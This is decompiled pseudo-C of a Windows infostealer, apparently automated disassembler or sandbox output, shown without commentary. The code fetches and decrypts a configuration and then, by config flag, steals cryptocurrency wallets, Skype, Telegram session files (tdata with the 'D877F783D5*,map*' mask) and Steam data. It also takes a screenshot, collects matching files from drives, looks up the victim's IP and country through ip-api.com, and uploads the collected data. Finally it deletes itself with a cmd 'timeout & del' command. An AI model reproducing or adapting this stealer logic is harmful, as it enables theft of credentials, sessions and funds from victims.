                                                                                                                                                                                              				char _v512;
	char _v516;
	char _v520;
	char _v524;
	char _v528;
	char _v532;
	char _v536;
	char _v540;
	char _v544;
	char _v548;
	char _v552;
	char _v556;
	char _v560;
	char _v564;
	char _v568;
	char _v572;
	char _v576;
	char _v580;
	char _v584;
	char _v588;
	char _v592;
	char _v596;
	char _v600;
	intOrPtr _v604;
	char _v608;
	char _v612;
	char _v616;
	char _v620;
	intOrPtr _v624;
	char _v628;
	char _v632;
	char _v636;
	char _v640;
	char _v644;
	char _v648;
	char _v652;
	void* _t446;
	void* _t452;
	intOrPtr* _t453;
	intOrPtr _t546;
	intOrPtr* _t616;
	intOrPtr* _t623;
	intOrPtr* _t630;
	intOrPtr* _t637;
	intOrPtr _t651;
	intOrPtr* _t654;
	intOrPtr* _t657;
	intOrPtr* _t660;
	intOrPtr* _t663;
	intOrPtr _t668;
	intOrPtr* _t671;
	void* _t677;
	intOrPtr* _t714;
	intOrPtr _t756;
	signed int _t806;
	intOrPtr* _t827;
	intOrPtr* _t830;
	signed int _t837;
	signed int _t884;
	intOrPtr _t907;
	int _t920;
	intOrPtr* _t932;
	void* _t954;
	signed int _t955;
	signed int _t956;
	void* _t957;
	void* _t975;
	intOrPtr _t983;
	intOrPtr _t1001;
	intOrPtr* _t1045;
	intOrPtr* _t1072;
	void* _t1094;
	void* _t1102;
	void* _t1132;
	void* _t1134;
	void* _t1135;
	signed int _t1137;
	intOrPtr _t1140;
	intOrPtr _t1141;
	void* _t1146;
	void* _t1167;
	void* _t1173;
	void* _t1181;
	void* _t1183;

	_t1183 = __fp0;
	_t1130 = __edi;
	_t1140 = _t1141;
	_t957 = 0x51;
	do {
		_push(0);
		_push(0);
		_t957 = _t957 - 1;
		_t1142 = _t957;
	} while (_t957 != 0);
	_push(__ebx);
	_push(__esi);
	_push(__edi);
	_v8 = __eax;
	E00403980(_v8);
	_push(_t1140);
	_push(0x41a13a);
	_push( *[fs:eax]);
	 *[fs:eax] = _t1141;
	E004034E4( &_v72);
	_v82 = 0;
	_v81 = 0;
	E0040357C( &_v88, 0x41a158);
	E0040561C();
	E00407D24( &_v308, _t1142);
	_push( &_v308);
	E00406C4C( &_v312, __ebx, __esi); // executed
	_pop(_t446);
	E00403798(_t446, _v312);
	_t452 = CreateMutexA(0, 0, E00403990(_v308)); // executed
	_v108 = _t452;
	_t453 =  *0x41b558; // 0x41c6a4
	if( *((intOrPtr*)( *_t453))() == 0xb7) {
		L68:
		_pop(_t983);
		 *[fs:eax] = _t983;
		_push(E0041A144);
		E004034E4( &_v652);
		E00403B98( &_v648, 2);
		E004034E4( &_v640);
		E00403B98( &_v636, 5);
		E00403508( &_v616, 0xa);
		E00403B80( &_v576);
		E00403508( &_v572, 2);
		E00403B80( &_v564);
		E00403508( &_v560, 2);
		E00403B80( &_v552);
		E00403508( &_v548, 2);
		E00403B80( &_v540);
		E00403508( &_v536, 2);
		E00403B80( &_v528);
		E00403508( &_v524, 2);
		E00403B80( &_v516);
		E00403508( &_v512, 2);
		E00403B80( &_v504);
		E00403508( &_v500, 2);
		E00403B80( &_v492);
		E00403508( &_v488, 0xa);
		E00403B98( &_v448, 2);
		E004034E4( &_v440);
		E00403B98( &_v436, 3);
		E004034E4( &_v424);
		E00403B98( &_v420, 2);
		E004034E4( &_v412);
		E00403B98( &_v408, 8);
		E004034E4( &_v376);
		E00403B98( &_v372, 4);
		E00403508( &_v356, 0xd);
		_t1001 =  *0x405f2c; // 0x405f30
		E00404224( &_v60, 5, _t1001);
		E00403508( &_v40, 7);
		E004034E4( &_v8);
		E004034E4( &_v112);
		E00403508( &_v104, 5);
		E00403508( &_v80, 3);
		return E004034E4( &_v64);
	} else {
		E004034E4( &_v112);
		_t954 = 0x44d;
		_t1137 = 0x41b0fc;
		while( *_t1137 != 0) {
			E004036CC();
			E00403798( &_v112, _v316);
			_t1137 = _t1137 + 1;
			_t954 = _t954 - 1;
			if(_t954 != 0) {
				continue;
			}
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E00418F9C(_v112, _t954, _t957, _t1130, _t1137);
                                                                                                                                                                                              					E00406C4C( &_v324, _t954, _t1137); // executed
                                                                                                                                                                                              					E00406810(_v324, _t954, _t957,  &_v320, _t1130, _t1137);
                                                                                                                                                                                              					E004037DC( &_v32, _v320, _v88);
                                                                                                                                                                                              					E004176D8( &_v32, _t954, 0x80000, _v88, _t1130, _t1137);
                                                                                                                                                                                              					_t546 =  *0x41c8c0; // 0x0, executed
                                                                                                                                                                                              					E00418688(_t546, _t954, _v32, _t1130, _t1137,  &_v16); // executed
                                                                                                                                                                                              					E004176D8( &_v16, _t954, 0x80000, _v88, _t1130, _t1137);
                                                                                                                                                                                              					_t1146 = E00403790(_v16) - 0x2710;
                                                                                                                                                                                              					if(_t1146 < 0) {
                                                                                                                                                                                              						goto L68;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E004038DC(_v16, 0x41a164);
                                                                                                                                                                                              					if(_t1146 == 0) {
                                                                                                                                                                                              						goto L68;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E00407428(0x41a184, _t954, 0x41a174, _v16, _t1137,  &_v328);
                                                                                                                                                                                              					E00406984(_v328, _t954,  &_v36, _t1130, _t1137);
                                                                                                                                                                                              					E00407428(0x41a1a0, _t954, 0x41a190, _v16, _t1137,  &_v332);
                                                                                                                                                                                              					E00406AE4(_v332, _t954,  &_v40, _t1130, _t1137);
                                                                                                                                                                                              					E0040795C(0x41a1ac,  &_v44, _v36, _t1146);
                                                                                                                                                                                              					_t968 = 0x41a1b8;
                                                                                                                                                                                              					E00407428(0x41a1c8, _t954, 0x41a1b8, _v16, _t1137,  &_v340);
                                                                                                                                                                                              					_t1017 =  &_v336;
                                                                                                                                                                                              					E00406984(_v340, _t954,  &_v336, _t1130, _t1137);
                                                                                                                                                                                              					E004080C4(_v336, _t1146);
                                                                                                                                                                                              					E00408328(_v40, _t954,  &_v336, _t1130, _t1137);
                                                                                                                                                                                              					E0040DC44();
                                                                                                                                                                                              					_t1132 = E004045EC(_v44) - 1;
                                                                                                                                                                                              					if(_t1132 < 0) {
                                                                                                                                                                                              						L48:
                                                                                                                                                                                              						_push(_v8);
                                                                                                                                                                                              						_push(0x41a1ac);
                                                                                                                                                                                              						E00417290( &_v464, _t954, _t1017, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v464);
                                                                                                                                                                                              						E00403850();
                                                                                                                                                                                              						E0040DCE8(_v460, _t954, "System.txt", _t1132, _t1137);
                                                                                                                                                                                              						E00406C4C( &_v472, _t954, _t1137);
                                                                                                                                                                                              						E00406810(_v472, _t954, _t968,  &_v468, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v468);
                                                                                                                                                                                              						_push(0x41a3e8);
                                                                                                                                                                                              						E00407A4C( &_v480, _t954, _t1132, _t1137);
                                                                                                                                                                                              						E00406810(_v480, _t954, _t968,  &_v476, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v476);
                                                                                                                                                                                              						_push(0x41a3e8);
                                                                                                                                                                                              						E00406BB4( &_v492);
                                                                                                                                                                                              						E0040377C( &_v488, _v492);
                                                                                                                                                                                              						E00406810(_v488, _t954, _t968,  &_v484, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v484);
                                                                                                                                                                                              						_push(0x41a3e8);
                                                                                                                                                                                              						E004066C0( &_v504, _t1168);
                                                                                                                                                                                              						E0040377C( &_v500, _v504);
                                                                                                                                                                                              						E00406810(_v500, _t954, _t968,  &_v496, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v496);
                                                                                                                                                                                              						_push(0x41a3e8);
                                                                                                                                                                                              						E00406610( &_v516);
                                                                                                                                                                                              						E0040377C( &_v512, _v516);
                                                                                                                                                                                              						E00406810(_v512, _t954, _t968,  &_v508, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v508);
                                                                                                                                                                                              						_push(0x41a3e8);
                                                                                                                                                                                              						E004065CC( &_v528);
                                                                                                                                                                                              						E0040377C( &_v524, _v528);
                                                                                                                                                                                              						E00406810(_v524, _t954, _t968,  &_v520, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v520);
                                                                                                                                                                                              						_push(0x41a3e8);
                                                                                                                                                                                              						_t616 =  *0x41b5b8; // 0x41b0b8
                                                                                                                                                                                              						E00406FDC( *_t616, _t954,  &_v540, _t1137, _t1168);
                                                                                                                                                                                              						E0040377C( &_v536, _v540);
                                                                                                                                                                                              						E00406810(_v536, _t954, _t968,  &_v532, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v532);
                                                                                                                                                                                              						_push(0x41a3e8);
                                                                                                                                                                                              						_t623 =  *0x41b5c4; // 0x41b0b0
                                                                                                                                                                                              						E00406FDC( *_t623, _t954,  &_v552, _t1137, _t1168);
                                                                                                                                                                                              						E0040377C( &_v548, _v552);
                                                                                                                                                                                              						E00406810(_v548, _t954, _t968,  &_v544, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v544);
                                                                                                                                                                                              						_push(0x41a3e8);
                                                                                                                                                                                              						_t630 =  *0x41b584; // 0x41b0b4
                                                                                                                                                                                              						E00406FDC( *_t630, _t954,  &_v564, _t1137, _t1168);
                                                                                                                                                                                              						E0040377C( &_v560, _v564);
                                                                                                                                                                                              						E00406810(_v560, _t954, _t968,  &_v556, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v556);
                                                                                                                                                                                              						_push(0x41a3e8);
                                                                                                                                                                                              						_t637 =  *0x41b638; // 0x41b0ac
                                                                                                                                                                                              						E00406FDC( *_t637, _t954,  &_v576, _t1137, _t1168);
                                                                                                                                                                                              						E0040377C( &_v572, _v576);
                                                                                                                                                                                              						E00406810(_v572, _t954, _t968,  &_v568, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v568);
                                                                                                                                                                                              						_push(0x41a3e8);
                                                                                                                                                                                              						E00406810(_v8, _t954, _t968,  &_v580, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v580);
                                                                                                                                                                                              						_push(0x41a3e8);
                                                                                                                                                                                              						E00407D24( &_v588, _t1168);
                                                                                                                                                                                              						E00406810(_v588, _t954, _t968,  &_v584, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v584);
                                                                                                                                                                                              						E00403850();
                                                                                                                                                                                              						_t651 =  *0x41b5f4; // 0x41b0bc
                                                                                                                                                                                              						_t1045 =  *0x41b5f4; // 0x41b0bc
                                                                                                                                                                                              						E00403798(_t651,  *_t1045);
                                                                                                                                                                                              						_push(_v24);
                                                                                                                                                                                              						_t654 =  *0x41b5f4; // 0x41b0bc
                                                                                                                                                                                              						_push( *_t654);
                                                                                                                                                                                              						E004063A4( &_v592, _t954, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v592);
                                                                                                                                                                                              						_t657 =  *0x41b5f4; // 0x41b0bc
                                                                                                                                                                                              						_push( *_t657);
                                                                                                                                                                                              						E0040653C( &_v596, _t954, _t968, _t1132, _t1137);
                                                                                                                                                                                              						_push(_v596);
                                                                                                                                                                                              						_t660 =  *0x41b5f4; // 0x41b0bc
                                                                                                                                                                                              						_push( *_t660);
                                                                                                                                                                                              						E0040DEE4( &_v600, _t954, _t1168);
                                                                                                                                                                                              						_push(_v600);
                                                                                                                                                                                              						_t663 =  *0x41b5f4; // 0x41b0bc
                                                                                                                                                                                              						_push( *_t663);
                                                                                                                                                                                              						E00403850();
                                                                                                                                                                                              						_t1169 = _v81 - 1;
                                                                                                                                                                                              						if(_v81 == 1) {
                                                                                                                                                                                              							_push(_v76);
                                                                                                                                                                                              							_push(0x41a3b8);
                                                                                                                                                                                              							_push(_v80);
                                                                                                                                                                                              							E00403850();
                                                                                                                                                                                              							E00403798( &_v20, _v604);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E004176D8( &_v20, _t954, 0x80000, _v88, _t1132, _t1137);
                                                                                                                                                                                              						_t970 = 0;
                                                                                                                                                                                              						_t668 =  *0x41c8c0; // 0x0
                                                                                                                                                                                              						E00418688(_t668, _t954, _v20, _t1132, _t1137,  &_v608);
                                                                                                                                                                                              						_t671 =  *0x41b60c; // 0x41c6a0
                                                                                                                                                                                              						 *((intOrPtr*)( *_t671))(_v108);
                                                                                                                                                                                              						E004050C8(0x41a3f4, _t954, _t1132, _t1137, _t1169);
                                                                                                                                                                                              						_t677 = E00403790(_v72);
                                                                                                                                                                                              						_t1170 = _t677 - 3;
                                                                                                                                                                                              						if(_t677 <= 3) {
                                                                                                                                                                                              							L62:
                                                                                                                                                                                              							E004087DC(_t954, _t1137);
                                                                                                                                                                                              							E00407D24( &_v616, _t1181);
                                                                                                                                                                                              							E004038DC(_v616, 0x41a424);
                                                                                                                                                                                              							if(_t1181 != 0) {
                                                                                                                                                                                              								L65:
                                                                                                                                                                                              								E004038DC(_v8, 0x41a430);
                                                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                                                              									__eflags = _v82 - 1;
                                                                                                                                                                                              									if(_v82 == 1) {
                                                                                                                                                                                              										E004028E0( &_v304, 0x3c);
                                                                                                                                                                                              										_v304 = 0x3c;
                                                                                                                                                                                              										_v300 = 0x1c0;
                                                                                                                                                                                              										_v296 = 0;
                                                                                                                                                                                              										_v292 = 0;
                                                                                                                                                                                              										E004062D8(L"%comspec%",  &_v620, __eflags);
                                                                                                                                                                                              										_v288 = E00403D3C(_v620);
                                                                                                                                                                                              										E004062D8(L"/c %WINDIR%\\system32\\timeout.exe 3 & del \"",  &_v628, __eflags);
                                                                                                                                                                                              										E00402754(0,  &_v640);
                                                                                                                                                                                              										E00403D2C( &_v636, _v640);
                                                                                                                                                                                              										E0040770C(_v636, _t954, 0,  &_v632, _t1137, __eflags);
                                                                                                                                                                                              										E00403E1C();
                                                                                                                                                                                              										_v284 = E00403D3C(_v624);
                                                                                                                                                                                              										E00402754(0,  &_v652);
                                                                                                                                                                                              										E00403D2C( &_v648, _v652);
                                                                                                                                                                                              										E00407798(_v648, _t954, 0,  &_v644, _t1137, __eflags);
                                                                                                                                                                                              										_v280 = E00403D3C(_v644);
                                                                                                                                                                                              										__eflags = 0;
                                                                                                                                                                                              										_v276 = 0;
                                                                                                                                                                                              										_t714 =  *0x41b564; // 0x41c768
                                                                                                                                                                                              										 *((intOrPtr*)( *_t714))( &_v304, E0041A4AC, _v632, _v628);
                                                                                                                                                                                              										ExitProcess(0);
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L68;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							E004038DC(_v8, 0x41a430);
                                                                                                                                                                                              							if(_t1181 != 0) {
                                                                                                                                                                                              								goto L65;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							E00407DD4(_t954, _t970, _t1132, _t1137, _t1181);
                                                                                                                                                                                              							goto L68;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t970 =  &_v52;
                                                                                                                                                                                              							E0040795C(0x41a1ac,  &_v52, _v72, _t1170);
                                                                                                                                                                                              							_t1132 = E004045EC(_v52) - 1;
                                                                                                                                                                                              							if(_t1132 < 0) {
                                                                                                                                                                                              								goto L62;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t1134 = _t1132 + 1;
                                                                                                                                                                                              							_t955 = 0;
                                                                                                                                                                                              							do {
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								E004047A8();
                                                                                                                                                                                              								_t1141 = _t1141 + 4;
                                                                                                                                                                                              								_t970 =  &_v56;
                                                                                                                                                                                              								E0040795C(0x41a2dc,  &_v56,  *((intOrPtr*)(_v52 + _t955 * 4)), 0);
                                                                                                                                                                                              								_t1173 = E004045EC(_v56) - 4;
                                                                                                                                                                                              								if(_t1173 != 0) {
                                                                                                                                                                                              									goto L61;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								E004038DC( *_v56, 0x41a400);
                                                                                                                                                                                              								if(_t1173 != 0) {
                                                                                                                                                                                              									goto L61;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t970 =  &_v60;
                                                                                                                                                                                              								E0040795C(0x41a40c,  &_v60,  *((intOrPtr*)(_v56 + 0xc)), _t1173);
                                                                                                                                                                                              								_v83 = 0;
                                                                                                                                                                                              								_t1137 = E004045EC(_v60) - 1;
                                                                                                                                                                                              								if(_t1137 < 0) {
                                                                                                                                                                                              									L59:
                                                                                                                                                                                              									_t1179 = _v83 - 1;
                                                                                                                                                                                              									if(_v83 == 1) {
                                                                                                                                                                                              										E004038DC( *((intOrPtr*)(_v56 + 8)), 0x41a418);
                                                                                                                                                                                              										E00418CF4( *((intOrPtr*)(_v56 + 4)), _t955, 0x41a400 | _t1179 == 0x00000000, _t1134, _t1137);
                                                                                                                                                                                              									}
                                                                                                                                                                                              									goto L61;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t1137 = _t1137 + 1;
                                                                                                                                                                                              								_v68 = 0;
                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                              									E00406318( *((intOrPtr*)(_v60 + _v68 * 4)), _t955,  &_v612, _t1134, _t1137);
                                                                                                                                                                                              									_t1072 =  *0x41b568; // 0x41c66c
                                                                                                                                                                                              									_v83 = E00403A78(_v612,  *_t1072) != 0;
                                                                                                                                                                                              									if(_v83 == 1) {
                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_v68 = _v68 + 1;
                                                                                                                                                                                              									_t1137 = _t1137 - 1;
                                                                                                                                                                                              									if(_t1137 != 0) {
                                                                                                                                                                                              										continue;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									goto L59;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L59;
                                                                                                                                                                                              								L61:
                                                                                                                                                                                              								_t955 = _t955 + 1;
                                                                                                                                                                                              								_t1134 = _t1134 - 1;
                                                                                                                                                                                              								_t1181 = _t1134;
                                                                                                                                                                                              							} while (_t1181 != 0);
                                                                                                                                                                                              							goto L62;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t1135 = _t1132 + 1;
                                                                                                                                                                                              						_t956 = 0;
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							if(E00403790( *((intOrPtr*)(_v44 + _t956 * 4))) < 5) {
                                                                                                                                                                                              								goto L47;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							if(_t956 == 0) {
                                                                                                                                                                                              								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 9)) == 0x2b) {
                                                                                                                                                                                              									E00414098();
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t907 =  *((intOrPtr*)(_v44 + _t956 * 4));
                                                                                                                                                                                              								_t1154 =  *((char*)(_t907 + 3)) - 0x2b;
                                                                                                                                                                                              								if( *((char*)(_t907 + 3)) == 0x2b) {
                                                                                                                                                                                              									E00415EA8(L"Coins", _t956, _t968, _t1017, _t1135, _t1137, _t1154);
                                                                                                                                                                                              									_t932 =  *0x41b5c4; // 0x41b0b0
                                                                                                                                                                                              									_t1155 =  *_t932;
                                                                                                                                                                                              									if( *_t932 > 0) {
                                                                                                                                                                                              										E004050C8(0x41a200, _t956, _t1135, _t1137, _t1155);
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 4)) == 0x2b) {
                                                                                                                                                                                              									E00414CB8(L"Skype", _t956, _t1135, _t1137);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 5)) == 0x2b) {
                                                                                                                                                                                              									_t968 = L"Telegram";
                                                                                                                                                                                              									_t1017 = L"D877F783D5*,map*";
                                                                                                                                                                                              									E00414408(L"%appdata%\\Telegram Desktop\\tdata\\", _t956, L"Telegram", L"D877F783D5*,map*", _t1135, _t1137, 0, 0, 1, 0x3e8, 0);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 6)) == 0x2b) {
                                                                                                                                                                                              									E00414F40(L"Steam", _t956, _t1135, _t1137);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 7)) == 0x2b) {
                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                              									_push(0x32);
                                                                                                                                                                                              									_push(L"image/jpeg");
                                                                                                                                                                                              									_push( &_v64);
                                                                                                                                                                                              									_push(GetSystemMetrics(1));
                                                                                                                                                                                              									_t920 = GetSystemMetrics(0);
                                                                                                                                                                                              									_t968 = 0;
                                                                                                                                                                                              									_pop(_t1094);
                                                                                                                                                                                              									E004178B4(_t920, _t956, 0, _t1094, _t1135, _t1137);
                                                                                                                                                                                              									_t1017 = "scr.jpg";
                                                                                                                                                                                              									E0040DCE8(_v64, _t956, "scr.jpg", _t1135, _t1137);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 8)) == 0x2b) {
                                                                                                                                                                                              									_v82 = 1;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t756 = _v44;
                                                                                                                                                                                              							_t1162 =  *((char*)( *((intOrPtr*)(_t756 + _t956 * 4)))) - 0x46;
                                                                                                                                                                                              							if( *((char*)( *((intOrPtr*)(_t756 + _t956 * 4)))) != 0x46) {
                                                                                                                                                                                              								L41:
                                                                                                                                                                                              								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)))) == 0x4c) {
                                                                                                                                                                                              									_push(_v72);
                                                                                                                                                                                              									_push( *((intOrPtr*)(_v44 + _t956 * 4)));
                                                                                                                                                                                              									_push(0x41a1ac);
                                                                                                                                                                                              									_t1017 = 3;
                                                                                                                                                                                              									E00403850();
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t1167 =  *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)))) - 0x49;
                                                                                                                                                                                              								if(_t1167 == 0) {
                                                                                                                                                                                              									_t968 =  &_v48;
                                                                                                                                                                                              									E0040795C(0x41a2dc,  &_v48,  *((intOrPtr*)(_v44 + _t956 * 4)), _t1167);
                                                                                                                                                                                              									E004038DC( *((intOrPtr*)(_v48 + 4)), 0x41a348);
                                                                                                                                                                                              									if(_t1167 != 0) {
                                                                                                                                                                                              										_t1017 = "ip.txt";
                                                                                                                                                                                              										E0040DCE8( *((intOrPtr*)(_v48 + 4)), _t956, "ip.txt", _t1135, _t1137);
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_v81 = 1;
                                                                                                                                                                                              										E00418688("http://ip-api.com/json", _t956, 0, _t1135, _t1137,  &_v28);
                                                                                                                                                                                              										E00407428("\"query\":\"", _t956, 0x41a380, _v28, _t1137,  &_v76);
                                                                                                                                                                                              										_t968 = 0x41a380;
                                                                                                                                                                                              										E00407428("\"countryCode\":\"", _t956, 0x41a380, _v28, _t1137,  &_v80);
                                                                                                                                                                                              										_push(_v76);
                                                                                                                                                                                              										_push(0x41a3b8);
                                                                                                                                                                                              										_push(_v80);
                                                                                                                                                                                              										E00403850();
                                                                                                                                                                                              										_t1017 = "ip.txt";
                                                                                                                                                                                              										E0040DCE8(_v456, _t956, "ip.txt", _t1135, _t1137);
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								E0040795C(0x41a2dc,  &_v48,  *((intOrPtr*)(_v44 + _t956 * 4)), _t1162);
                                                                                                                                                                                              								E0040357C( &_v92,  *((intOrPtr*)(_v48 + 8)));
                                                                                                                                                                                              								if(E00403A78(0x41a2e8, _v92) != 1) {
                                                                                                                                                                                              									E00403D2C( &_v428,  *((intOrPtr*)(_v48 + 0x1c)));
                                                                                                                                                                                              									_push(_v428);
                                                                                                                                                                                              									E00403D2C( &_v432,  *((intOrPtr*)(_v48 + 0x10)));
                                                                                                                                                                                              									_push(E00407048(_v432, _t956,  &_v48, __eflags));
                                                                                                                                                                                              									_push(E004038DC( *((intOrPtr*)(_v48 + 0x14)), 0x41a32c) & 0xffffff00 | __eflags == 0x00000000);
                                                                                                                                                                                              									_t806 = E004038DC( *((intOrPtr*)(_v48 + 0x18)), 0x41a32c);
                                                                                                                                                                                              									_t193 = __eflags == 0;
                                                                                                                                                                                              									__eflags = _t193;
                                                                                                                                                                                              									_push(_t806 & 0xffffff00 | _t193);
                                                                                                                                                                                              									_push(1);
                                                                                                                                                                                              									_push("Files\\");
                                                                                                                                                                                              									_push( *((intOrPtr*)(_v48 + 4)));
                                                                                                                                                                                              									_push(0x41a310);
                                                                                                                                                                                              									E00403850();
                                                                                                                                                                                              									E00403D2C( &_v436, _v440);
                                                                                                                                                                                              									_push(_v436);
                                                                                                                                                                                              									E00403D2C( &_v444,  *((intOrPtr*)(_v48 + 0xc)));
                                                                                                                                                                                              									_push(_v444);
                                                                                                                                                                                              									E004037DC( &_v452, 0x41a310,  *((intOrPtr*)(_v48 + 8)));
                                                                                                                                                                                              									E00403D2C( &_v448, _v452);
                                                                                                                                                                                              									_pop(_t1017);
                                                                                                                                                                                              									_pop(_t968);
                                                                                                                                                                                              									E00414408(_v448, _t956, _t968, _t1017, _t1135, _t1137);
                                                                                                                                                                                              									goto L41;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t968 = 0x41a2f8;
                                                                                                                                                                                              								_t1017 = _v92;
                                                                                                                                                                                              								E00407428(0x41a2e8, _t956, 0x41a2f8, _v92, _t1137,  &_v104);
                                                                                                                                                                                              								_push( &_v241);
                                                                                                                                                                                              								_push(0x81);
                                                                                                                                                                                              								_t827 =  *0x41b59c; // 0x41c6fc
                                                                                                                                                                                              								if( *((intOrPtr*)( *_t827))() == 0) {
                                                                                                                                                                                              									goto L68;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t1137 =  &_v241;
                                                                                                                                                                                              								while( *_t1137 != 0) {
                                                                                                                                                                                              									_t830 =  *0x41b54c; // 0x41c700
                                                                                                                                                                                              									E00406FDC( *((intOrPtr*)( *_t830))(_t1137), _t956,  &_v360, _t1137, __eflags);
                                                                                                                                                                                              									E0040377C( &_v356, _v360);
                                                                                                                                                                                              									_t1017 = _v104;
                                                                                                                                                                                              									_t837 = E00403A78(_v356, _v104);
                                                                                                                                                                                              									__eflags = _t837;
                                                                                                                                                                                              									if(_t837 != 0) {
                                                                                                                                                                                              										_push( &_v364);
                                                                                                                                                                                              										E00403C98( &_v368, _t1137);
                                                                                                                                                                                              										_push(_v368);
                                                                                                                                                                                              										_push("%DSK_");
                                                                                                                                                                                              										_push(_v104);
                                                                                                                                                                                              										E00403850();
                                                                                                                                                                                              										E00403D2C( &_v372, _v376);
                                                                                                                                                                                              										_push(_v372);
                                                                                                                                                                                              										E00403D2C( &_v380, _v92);
                                                                                                                                                                                              										_pop(_t1102);
                                                                                                                                                                                              										_t975 = 0x41a304;
                                                                                                                                                                                              										E004070BC(_v380, _t956, _t975, _t1102);
                                                                                                                                                                                              										E0040377C( &_v100, _v364);
                                                                                                                                                                                              										E004034E4( &_v96);
                                                                                                                                                                                              										_push( *((intOrPtr*)(_v48 + 4)));
                                                                                                                                                                                              										_push(0x41a310);
                                                                                                                                                                                              										_push(_v100);
                                                                                                                                                                                              										E00403850();
                                                                                                                                                                                              										E00403D2C( &_v388, _v96);
                                                                                                                                                                                              										E004070BC(_v388, _t956, 0, 0x41a318,  &_v384);
                                                                                                                                                                                              										E00403D58( &_v384, 0, 0x41a320, __eflags);
                                                                                                                                                                                              										E0040377C( &_v96, _v384);
                                                                                                                                                                                              										E00403D2C( &_v396, _v96);
                                                                                                                                                                                              										E0040781C(_v396, _t956,  &_v392, __eflags);
                                                                                                                                                                                              										E0040377C( &_v96, _v392);
                                                                                                                                                                                              										E00403D2C( &_v400,  *((intOrPtr*)(_v48 + 0x1c)));
                                                                                                                                                                                              										_push(_v400);
                                                                                                                                                                                              										E00403D2C( &_v404,  *((intOrPtr*)(_v48 + 0x10)));
                                                                                                                                                                                              										_push(E00407048(_v404, _t956, 0, __eflags));
                                                                                                                                                                                              										_push(E004038DC( *((intOrPtr*)(_v48 + 0x14)), 0x41a32c) & 0xffffff00 | __eflags == 0x00000000);
                                                                                                                                                                                              										_t884 = E004038DC( *((intOrPtr*)(_v48 + 0x18)), 0x41a32c);
                                                                                                                                                                                              										_t163 = __eflags == 0;
                                                                                                                                                                                              										__eflags = _t163;
                                                                                                                                                                                              										_push(_t884 & 0xffffff00 | _t163);
                                                                                                                                                                                              										_push(1);
                                                                                                                                                                                              										E004037DC( &_v412, _v96, "Files\\");
                                                                                                                                                                                              										E00403D2C( &_v408, _v412);
                                                                                                                                                                                              										_push(_v408);
                                                                                                                                                                                              										E00403D2C( &_v416,  *((intOrPtr*)(_v48 + 0xc)));
                                                                                                                                                                                              										_push(_v416);
                                                                                                                                                                                              										E004037DC( &_v424, 0x41a310, _v100);
                                                                                                                                                                                              										E00403D2C( &_v420, _v424);
                                                                                                                                                                                              										_pop(_t1017);
                                                                                                                                                                                              										_pop(_t968);
                                                                                                                                                                                              										E00414408(_v420, _t956, _t968, _t1017, _t1135, _t1137);
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t1137 = _t1137 + 4;
                                                                                                                                                                                              									__eflags = _t1137;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L41;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L47:
                                                                                                                                                                                              							_t956 = _t956 + 1;
                                                                                                                                                                                              							_t1135 = _t1135 - 1;
                                                                                                                                                                                              							_t1168 = _t1135;
                                                                                                                                                                                              						} while (_t1135 != 0);
                                                                                                                                                                                              						goto L48;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
